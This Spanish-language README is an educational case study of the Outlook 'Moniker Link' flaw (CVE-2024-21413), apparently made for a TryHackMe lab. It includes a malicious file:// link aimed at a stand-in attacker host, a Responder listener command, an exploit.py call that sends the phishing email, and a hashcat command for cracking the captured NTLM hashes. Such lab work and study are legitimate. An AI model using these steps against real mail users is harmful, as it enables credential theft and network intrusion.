
Un estudio de caso del CVE-2024-21413. Usado como parámetro la sala de TryHackMe Moniker Link (CVE-2024-21413). Se hicieron ediciones con claude code en el exploit.
⚠️ Aviso Legal: Este repositorio es exclusivamente con fines educativos y de investigación en seguridad. Todas las demostraciones se realizaron en entornos controlados y aislados. El uso de estas técnicas contra sistemas sin autorización explícita es ilegal y no ético.
| Campo | Detalle |
|---|---|
| CVE | CVE-2024-21413 |
| Divulgación | 13 de febrero de 2024 (Patch Tuesday) |
| CVSS Score | 9.8 (Crítico) |
| Producto | Microsoft Outlook |
| Tipo | RCE + Filtración de Credenciales (Hash NTLM) |
| Vector | Red / Correo (sin autenticación previa) |
| Interacción | Requiere interacción del usuario (clic en el enlace) |
| Apodo | Moniker Link |
La CVE-2024-21413 es una vulnerabilidad crítica en Microsoft Outlook que permite a un atacante:
El nombre "Moniker Link" proviene de la explotación de Component Object Model (COM) Monikers — un mecanismo de Windows para referenciar objetos por cadena — para eludir las protecciones de Outlook contra enlaces file://.
Normalmente, Outlook bloquea los enlaces file:// que apuntan a recursos de red, mostrando una advertencia de seguridad (Vista Protegida). La falla está en la forma en que Outlook procesa las URL que contienen el carácter ! — un separador de Moniker.
Un enlace malicioso con el formato:
file:///\\ATTACKER_IP\share\!something
El carácter ! hace que el analizador de Outlook interprete la URL como una referencia a un COM Moniker, ignorando las verificaciones de seguridad normales. El resultado:
Atacante envía correo → Víctima hace clic en el enlace → Outlook procesa URL con "!"
→ Bypass de la Vista Protegida → Conexión SMB automática → Hash NTLM capturado
Para reproducir este caso de estudio de forma segura:
| Máquina | Sistema Operacional | Rol |
|---|---|---|
| Atacante | Kali Linux | Listener SMB + Exploit |
| Objetivo | Windows 10/11 con Outlook vulnerable | Víctima |
Importante: Use una red aislada (NAT o Host-Only en VirtualBox/VMware). Nunca lo ejecute en redes reales.
# Responder — listener SMB/HTTP para captura de hashes
sudo apt install responder
# Python 3 — para ejecutar el exploit
python3 --version
# Verificar conectividad entre las máquinas
ping <IP_OBJETIVO>
ip a | grep inet
# Anote la IP de la interfaz que se comunica con el objetivo (ej: 192.168.56.10)
El Responder crea un servidor SMB falso que captura hashes de autenticación NTLM.
sudo responder -I eth0 -v
# Reemplace eth0 por su interfaz de red
Salida esperada:
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 192.168.56.20
[SMB] NTLMv2-SSP Username : DESKTOP-OBJETIVO\usuario
[SMB] NTLMv2-SSP Hash : usuario::DESKTOP-OBJETIVO:...
python3 exploit.py \
--sender [email protected] \
--recipient [email protected] \
--server <IP_SERVIDOR_CORREO> \
--attacker-ip 192.168.56.10
Cuando la víctima abre el correo y hace clic en el enlace, el Responder captura automáticamente el hash NTLM. Este hash puede ser:
hashcat -m 5600 hash.txt wordlist.txt
Vea el archivo exploit.py para el script completo y comentado.
Vea el archivo diagrama-ataque.html para una visualización interactiva del flujo completo del ataque.
Vea el archivo MITIGACAO.md para la guía completa de mitigación y defensa.
Vea el archivo CVE-BREAKDOWN.md para el análisis técnico detallado de la vulnerabilidad.
Caso de estudio desarrollado como parte de entrenamiento práctico en seguridad ofensiva a través de TryHackMe.
Este proyecto sigue los principios de responsible disclosure y ethical hacking. Todo el contenido aquí presente tiene como objetivo la educación y la mejora de la postura de seguridad.